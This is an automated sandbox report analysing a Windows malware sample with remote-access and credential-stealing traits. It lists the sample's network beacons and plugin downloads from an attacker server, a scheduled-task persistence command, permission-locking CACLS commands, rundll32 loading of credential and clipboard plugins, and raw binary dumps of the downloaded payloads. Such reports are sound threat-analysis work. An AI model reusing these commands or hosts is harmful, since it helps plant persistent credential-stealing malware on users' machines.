popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

power.exe

Ave Maria WARZONE RAT Emotet Gen1 Generic Malware UPX Malicious Library Malicious Packer Admin Tool (Sysinternals etc ...) PE64 PE File OS Processor Check JPEG Format PE32 .NET EXE DLL
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 March 22, 2023, 5:26 p.m. March 22, 2023, 5:30 p.m.
Size 1.1MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 ba218b60cb97c3532b8b9c796d954622
SHA256 8bee3d713fc207a8ca82e8eaf85396b55fcd29fe9214a83ce9399fa48ac4bd4b
CRC32 B5E47169
ssdeep 24576:+DqJfHKurNTbvYkwdBd9BO3Oz1ITm+2Hd:+DIHKurdbvYDz5+2Hd
Yara
  • Is_DotNET_EXE - (no description)
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

Name Response Post-Analysis Lookup
j.ffbbjjkk.com
A 104.21.8.227
A 172.67.158.22
172.67.158.22
IP Address Status Action
104.21.8.227 Active Moloch
164.124.101.2 Active Moloch
77.73.134.27 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "nbveek.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
jgzhang+0x23ee @ 0x4023ee

exception.instruction_r: 8b 00 8b 00 8b 40 10 8b 55 20 8b 12 c7 44 24 14
exception.symbol: New___wmi___IWbemServices_ExecMethod@32+0x2a3 New___wmi___IWbemServices_ExecMethodAsync@28-0xde
exception.instruction: mov eax, dword ptr [eax]
exception.module: monitor-x86.dll
exception.exception_code: 0xc0000005
exception.offset: 66639
exception.address: 0x736e044f
registers.esp: 1634368
registers.edi: 5199156
registers.eax: 0
registers.ebp: 1634824
registers.edx: 1634060
registers.ebx: 0
registers.esi: 1634916
registers.ecx: 1747255296
1 0 0

__exception__

 stacktrace: 
Save+0x8d733 Main-0x1371d cred64+0x91303 @ 0x7fef4831303
Save+0x8f34b Main-0x11b05 cred64+0x92f1b @ 0x7fef4832f1b
Save+0x903d3 Main-0x10a7d cred64+0x93fa3 @ 0x7fef4833fa3
Save+0x9077f Main-0x106d1 cred64+0x9434f @ 0x7fef483434f
Save+0xa0838 Main-0x618 cred64+0xa4408 @ 0x7fef4844408
Main+0x65 cred64+0xa4a85 @ 0x7fef4844a85
rundll32+0x2f42 @ 0xff232f42
rundll32+0x3b7a @ 0xff233b7a
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 42 38 3c 00 75 f7 48 8b d0 48 8d 4c 24 50 e8 7a
exception.instruction: cmp byte ptr [rax + r8], dil
exception.exception_code: 0xc0000005
exception.symbol: Save+0x8d733 Main-0x1371d cred64+0x91303
exception.address: 0x7fef4831303
registers.r14: 0
registers.r15: 0
registers.rcx: 1099511627775
registers.rsi: 0
registers.r10: 152
registers.rbx: 0
registers.rsp: 1637424
registers.r11: 1632320
registers.r8: 0
registers.r9: 253416046601
registers.rdx: 3650336
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://77.73.134.27/8bmdh3Slb2/index.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://77.73.134.27/8bmdh3Slb2/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.73.134.27/8bmdh3Slb2/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.73.134.27/8bmdh3Slb2/Plugins/clip64.dll
request POST http://77.73.134.27/8bmdh3Slb2/index.php
request POST http://77.73.134.27/8bmdh3Slb2/index.php?scr=1
request GET http://77.73.134.27/8bmdh3Slb2/Plugins/cred64.dll
request GET http://77.73.134.27/8bmdh3Slb2/Plugins/clip64.dll
request GET https://j.ffbbjjkk.com/2701.html
request GET https://j.ffbbjjkk.com/logo.png
request POST http://77.73.134.27/8bmdh3Slb2/index.php
request POST http://77.73.134.27/8bmdh3Slb2/index.php?scr=1
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 1900544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00830000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 262144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00580000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00580000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00522000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00555000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00557000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0053c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0052a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73662000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2916
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73492000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73662000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7347f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x741b0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73491000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72cb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72c74000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73492000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0
description nbveek.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds
file C:\Users\test22\AppData\Roaming\07c6bc37dc5087\cred64.dll
file C:\Users\test22\AppData\Local\Temp\Player3.exe
file C:\Users\test22\AppData\Local\Temp\jgzhang.exe
file C:\Users\test22\AppData\Roaming\07c6bc37dc5087\clip64.dll
file C:\Users\test22\AppData\Local\Temp\ss31.exe
file C:\Users\test22\AppData\Local\Temp\db.dll
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "test22:N"&&CACLS "..\16de06bfb4" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
file C:\Users\test22\AppData\Local\Temp\Player3.exe
file C:\Users\test22\AppData\Local\Temp\jgzhang.exe
file C:\Users\test22\AppData\Local\Temp\ss31.exe
file C:\Users\test22\AppData\Local\Temp\jgzhang.exe
file C:\Users\test22\AppData\Local\Temp\db.dll
file C:\Users\test22\AppData\Roaming\07c6bc37dc5087\clip64.dll
file C:\Users\test22\AppData\Local\Temp\Player3.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "test22:N"&&CACLS "..\16de06bfb4" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $‘†ÕçsOÕçsOÕçsOŽwNÇçsOŽpNÞçsOŽvNeçsOŠvNçsOŠwNÚçsOŠpNÜçsOŽrNØçsOÕçrOiçsON‰zNÑçsON‰sNÔçsON‰ŒOÔçsON‰qNÔçsORichÕçsOPEd†<·cð" è ²Hë €à``{X¸{Œ°øà—Àhªppª À.text¨æ è  `.rdataœ ì @@.data¬o6|@À.pdataà—˜²@@_RDATA” J@@.rsrcø°L@@.relochÀN@BHƒì(A¸ H׉H ªèsT H |Û HƒÄ(é¯× ÌÌÌHƒì(A¸ HωH P«èCT H ¼Û HƒÄ(é× ÌÌÌHƒì(A¸HÉH `«èT H üÛ HƒÄ(éO× ÌÌÌHƒì(A¸ HŸ‰H ªèãS H <Ü HƒÄ(é× ÌÌÌHƒì(A¸H—‰H  ªè³S H |Ü HƒÄ(éïÖ ÌÌÌHƒì(A¸H‰H ШèƒS H ¼Ü HƒÄ(é¿Ö ÌÌÌHƒì(E3ÀHRë H ƒªèVS H ÿÜ HƒÄ(é’Ö ÌÌÌÌÌÌHƒì(E3ÀH"ë H “ªè&S H ?Ý HƒÄ(ébÖ ÌÌÌÌÌÌHƒì(E3ÀHòê H C©èöR H Ý HƒÄ(é2Ö ÌÌÌÌÌÌHƒì(E3ÀHÂê H ó§èÆR H ¿Ý HƒÄ(éÖ ÌÌÌÌÌÌHƒì(A¸H¯ˆH ¨è“R H üÝ HƒÄ(éÏÕ ÌÌÌHƒì(A¸?H߈H 0©ècR H <Þ HƒÄ(éŸÕ ÌÌÌH ™Þ éÕ ÌÌÌÌH ùÞ é€Õ ÌÌÌÌH Yß épÕ ÌÌÌÌH ¹ß é`Õ ÌÌÌÌH à éPÕ ÌÌÌÌHƒì(E3ÀHâé H Ó§èæQ H _à HƒÄ(é"Õ ÌÌÌÌÌÌH ¹à éÕ ÌÌÌÌH á éÕ ÌÌÌÌH yá éðÔ ÌÌÌÌH Ùá éàÔ ÌÌÌÌH 9â éÐÔ Hƒì(H ‰²è$Þ H ‰â HƒÄ(é°Ô H …â é¤Ô H Õâ é˜Ô H ã éŒÔ Hƒì(H ¶èàÝ H 5ã HƒÄ(élÔ ¸ÃÌÌÌÌÌÌÌÌÌÌH‰\$H‰l$H‰t$ WAVH‹ùLç A¸L5WìÿÿL‹É@A¶AÿȄÀt'‹ÐA¶B¶„0 oB8„2 ouIÿÁIÿÂE…ÀÑAÿÈE…ÀxA¶B¶Œ0 oA¶B¶„0 o+ÈuHƒÇE3ÛL‹×H…ÿuE‹ÓëD8t fIÿÂE8uøD+×Aâÿÿÿ?A‹êH|v@L‹ A‹ÂI‹ñL‹ÇE…Òt+A¶ÿȄÒt#A¶ B¶Œ1 oB8Œ2 ou IÿÀIÿÁ…ÀÕÿȅÀxA¶B¶Œ0 oA¶B¶„0 o+Áu¶.Bö„0`dFt"AÿÃHƒÃAƒû|„3ÀH‹\$ H‹l$(H‹t$0A^_ÃH‹\$ ¸H‹l$(H‹t$0A^_ÃÌÌÌÌÌÌ̃ùwHcÁH ¹uH‹ÁÃ3ÀÃÌÌÌÌÌÌÌÌÌHƒì(ƒù w+HcÁL­ÊA‹ ‚‰ I‚A‹D‚(A‰E…Ét‰J(3ÀHƒÄ(ÃL é6A¸õ8H;¹ènT¸HƒÄ(ÃÌÌÌÌL‰L$ L‰D$AVHƒìPH‰\$`E3öH‰l$HH‹ÙH‹II‹éH‰|$8L‰|$ M‹øHcúH…ÉtÿöˆH‰t$@ƒÿ ‡H9êÿÿ‹Œº HÊÿዃLA‰‹ƒP‰ED9´$€„䋃L‰ƒPéÓH »E‰7‹D‰ED9´$€„µD‰±Dé©‹C(A‹öL‰d$0L‰l$(E‹î…À~:I‹þ„H‹C H‹L8H…ÉtD8itÿAD8iuèî\‹C(ÿÆHƒÇ ;ð|ÑE‹æ…À~tM‹þ€H‹C J‹D8H…ÀtCH‹@H‹(·°‹½¼ƒÁpùH‹H‹I@ÿ8ˆH‹Í‹ðÿ‡¯÷ðµ¼Dî‹C(AÿÄIƒÇ D;à| H‹l$xL‹|$pL‹d$0A‹þ…À~4I‹ö€H‹C H‹L0H…ÉtD8qt ƒiuèá[ÿÇHƒÆ ;{(|ÖE‰/L‹l$(D‰u錋C(A‹öD‰t$h…À~5I‹þH‹C H‹L8H…ÉtD8qtÿAD8quèÞ[‹C(ÿÆHƒÇ ;ð|ÑHL$hE‹þH‰‹ …ÀŽÆI‹î€H‹C H‹t(H…ö„’¹ ÿ›†‹È‹FTF<F$F ¯ÈL$hH‹Nÿt†D$hH‹NHÿf†D$hH‹N0ÿX†D$hH‹N`ÿJ†D$hH‹~@H…ÿtH‹WH‹ËèQÊH‹?H…ÿuìH‹~H…ÿtH‹WH‹ËèÄ?H‹?H…ÿuì‹C(AÿÇHƒÅ D;øŒIÿÿÿH‹l$xL‰³ A‹þ…À~0I‹öH‹C H‹L0H…ÉtD8qt ƒiuèqZÿÇHƒÆ ;{(|ÖH‹L$p‹D$hD‰u‰éH‹{HL$hH‰‹ A‹Æ‰D$hH…ÿtgfDH‹×H‹Ëè5cL9³ t H‹×H‹Ëè1,ë3H;»hr"H;»psH‹ƒ`H‰ÿ‹LH‰»`ëH‹ÏèL+H‹XH…ÿu£‹D$hL‰³ D‰uA‰éƒA‹ÖE‹Î9S(~FD‹œ$€M‹ÆfDH‹C J‹DH…ÀtH‹@H‹DŒ¹ÔE…ÛtD‰´¹ÔÿÂIƒÀ ;S(|ËD‰uE‰ë)D‰uL9³ A‹ÆL9³~¸A‰ëA¾H‹KL‹|$ H‹|$8H‹t$@H‹l$HH‹\$`H…Étÿ¹„A‹ÆHƒÄPA^ÃÓ.K¾TTT®ÌÌÌÌÌÌÌÌH‰L$H‰T$L‰D$L‰L$ SUVWAVH‹ÑH\$8E3ÒH-ôI@D‹3À‹{‹sD‹[H[(L‹søE…Àt,@D¶ AÿÈAö)tG €HÿÂA¾ÁH‰T$0HƒÀÐE…ÀuØ;Ç|);Æ%E…Ût¾ D;ÙuA‰AÿÂH‹T$0HÿÂH‰T$0E…Ûu‹A‹ÂA^_^][ÃÌL‹ÜI‰[I‰kVWAVHƒìp3ÿICØI‰CÈH‹òI‰{ÀIC ÇD$@;E3ÀI‰{°DOÇD$0WI‰C H‹ÙÇD$ :WÉèóþÿÿƒø…жCL5ÿHHƒÃ<:…žH„$ E3ÀH‰D$(DO;WH‰|$ HKè®þÿÿƒø…‹HƒÃ€;.u[¶KBö1tPòHÿÃòò%fD¾ÁHÿÃòYËòYÓfnÀ¶óæÀ¶ÈBö0òXÈò\ÌuÕò^Ê
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyá–å~Lyá–â~Ryá–ä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPEL<·cà! ތ>ð°@0IœÌI<€øT°=p >@ð,.textVÝÞ `.rdata~`ðbâ@@.dataD` D@À.rsrcø€P@@.relocTR@Bj h¨<¹phè?#hêèŒ*YÃÌÌÌjhÉ<¹ˆhè#h`êèl*YÃÌÌÌjhÉ<¹ hèÿ"hÀêèL*YÃÌÌÌjhÉ<¹¸hèß"h ëè,*YÃÌÌÌjhÉ<¹Ðhè¿"h€ëè *YÃÌÌÌjhÉ<¹èhèŸ"hàëèì)YÃÌÌÌjhÉ<¹iè"h@ìèÌ)YÃÌÌÌjhÉ<¹iè_"h ìè¬)YÃÌÌÌj?h=¹0iè?"híèŒ)YÃÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèÂ2ƒÄ‹Æ^]ÂÌÌ̋I¸|<…ÉEÁÃÌÌU‹ìV‹ñFÇ”ñPèó2ƒÄöEt j Vè«%ƒÄ‹Æ^]AÇ”ñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿhIEôPè›2ÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèò1ƒÄÇìñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPè²1ƒÄÇ ñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹ZVWQS‹ñè‹=€h3É3À‰}ü…Û~53Ò;NjþEЃ=„h¸phCphƒ~r‹>ŠˆA‹}üB;Ë|˃~r‹_Æ‹Æ^[‹å]Ã_Æ‹Æ^[‹å]ÃÌÌÌÌÌU‹ìƒìSVW‹ò‹ùQ‰}ô‹FP‰Eðè“3ۉ]ø9]ðŽ)Dƒ~‹Ær‹¾Pè¯KƒÄ…Àu-‹N‹Æƒùr‹€< t‹Æƒùr‹ƒ‹Ïr‹Šé̃~‹Ær‹‹=@i3ҋ Di…ÿt+ŠˆEÿfDŠ]ÿƒù¸0iC0i8‹]øtB;×ráƒÊÿ‹E‹Èƒxr‹3À…ÿt.Š ˆMÿDƒ=Di¹0iŠ]ÿC 0i8‹]øt@;Çr݃Èÿƒ=Di¹0iC 0i‰Mì‹Mô‰Møƒyr‹ ‰Mø‹Ï+ȍ 3Ò÷÷‹Mì‹}ôŠ ‹MøˆC‰]ø;]ðŒÜþÿÿƒr‹Æ‹Ç_^[‹å]ÃÆ‹Ç_^[‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì@SVW‹Ù‹òQMĉ]ôèçýÿÿEċÖPMÜèYþÿÿhÇCÇCÆè°"‹Ø¹ƒÈÿ‰]ø‹ûƒÄ ó«3Ò„¾ŠÐ<‰‹Bƒú@|ð‹Uì3ö3ۍ~ø…ÒtA‹Møƒ}ðEÜCEܾ‹ƒøÿt'ÁæðƒÇx‹Ï‹ÆÓø‹MôPè‹Uìƒï‹MøC;Úr‹Eø…ÀthPèð!ƒÄ‹Uðƒúr(‹MÜB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwVRQèÀ!ƒÄ‹UØÇEìÇEðÆE܃úr(‹MÄB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQè~!ƒÄ‹Eô_^[‹å]Ãè›GÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì4‹E0SVW3ÿÆEè¾…À„‹]ÇEàÇEäÆEÐ;Ç‚´+ǍMÐ;ÃB؃}4E CE SÇPèƒþr.‹MèV‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡hRQè× ƒÄMЃ}Uó~EàEèCUƒ}ä‹uà‹]f~ÉMèCÁfÖEø;óu\ƒîr‹; uƒÀƒÂƒîsïƒþü„îŠ: u7ƒþý„ߊH:Ju&ƒþþ„ΊH:Juƒþÿ„½Š@:B„±‹E0G‹uü;ø‚õþÿÿ3ÿ‹Uƒþr/‹MèF‹Áþr‹IüƒÆ#+ÁƒÀüƒø‡’VQè ‹UƒÄ‹Eƒør'H‹Âùr‹RüƒÁ#+ƒÀüƒøw`QRèσċU4ÇEÇEÆEƒúr3‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwë ‹uüGéWÿÿÿRQ肃ċÇ_^[‹å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹]V‹ñ‰]üWjhÉ<ÇFÇFÆèD3ÿ…Û~1ƒ}ECEŠ8S¿C 